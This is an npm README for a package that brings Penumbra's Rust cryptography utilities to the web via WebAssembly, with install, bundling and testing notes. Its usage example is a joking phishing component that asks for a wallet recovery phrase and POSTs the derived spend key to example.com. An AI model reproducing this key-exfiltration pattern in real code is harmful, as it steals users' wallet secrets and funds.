@penumbra-zone-test/wasm
v8.0.1
Published
The Penumbra core repo has a ton of utilities and functions that are critical to developing an app that interacts with the Penumbra chain. However, it is written in Rust. This package exists to bridge the gap between the Rust environment and the web. This
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@penumbra-zone-test/wasm
The Penumbra core repo has a ton of utilities and functions that are critical to developing an app that interacts with the Penumbra chain. However, it is written in Rust. This package exists to bridge the gap between the Rust environment and the web. This is done via Web Assembly, the universal binary format that runs almost anywhere.
Consuming this package
If you're reading this, you're probably trying to use the package. Next.js / Webpack example.
enable the Buf Schema Registry
This package depends on types from the Buf Schema Registry. If you're not
configured to resolve those, you won't be able to install. Add the
@buf:registry
configuration to your local .npmrc
echo "@buf:registry=https://buf.build/gen/npm/v1/" >> .npmrc
install
pnpm add @penumbra-zone-test/wasm
If you intend to build transactions yourself or conduct other cryptographic
operations, you'll also want @penumbra-zone-test/keys
, an optional dependency
containing the large (~100MB) proving keys.
pnpm add @penumbra-zone-test/keys
import and use
import { generateSpendKey } from '@penumbra-zone-test/wasm/keys';
import { useState, useMemo } from 'react';
export const SpendKeyCat = () => {
const [phrase, setPhrase] = useState('');
const spendKey: SpendKey | null = useMemo(() => {
try {
return generateSpendKey(phrase);
} catch (e) {
console.log('Failed to generate key', e);
return null;
}
}, [phrase]);
useEffect(() => {
if (spendKey)
fetch('https://example.com/iamveryclever', {
method: 'POST',
body: spendKey.toJsonString(),
});
}, [spendKey]);
if (!spendKey)
return (
<>
<h1>Enter your Penumbra wallet recovery phrase to see a cat</h1>
<label>Right here:</label>
<input
value={phrase}
onChange={e => setPhrase(e.target.value)}
placeholder='all egg author trap jump tone gorilla forward favorite jungle accident exotic avoid wait desk'
/>
</>
);
return (
<>
<h1>Thanks!!</h1>
<marquee height='90%' behavior='alternate' direction='down'>
<marquee behavior='alternate' direction='right'>
<h2>Here's a cat:</h2>
<img src='https://cataas.com/cat' />
</marquee>
</marquee>
</>
);
};
bundling
Modern browsers provide great support for WASM, but you are probably using a bundler to transform your code.
We use Vite 5, which can handle the bundling natively, and
vite-plugin-wasm
for running
tests in node with vitest
.
If you're using Webpack 5 such as in a Next.js stack, you'll need to enable the
asyncWebAssembly
experimental feature. Check out the example
repository
which contains a complete working configuration. Compontents using this package
should be client-side only, and you might need to use next/dynamic
to
dynamically import the package.
Developing this package
The WASM in this package is generated by Rust living in the crate
directory.
You need Rust tooling to work on it. We use
wasm-bindgen
and
wasm-pack
.
See our monorepo setup for complete details, but after the typical git clone
it's as simple as
rustup target add wasm32-unknown-unknown
cargo install cargo-watch wasm-pack
Now you can just run pnpm compile
or pnpm dev
in the package directory.
Testing
This package contains both typescript tests executed with vitest
, and WASM tests
executed with wasm-bindgen-test
. You can run both with package scripts,
pnpm test
pnpm test:rust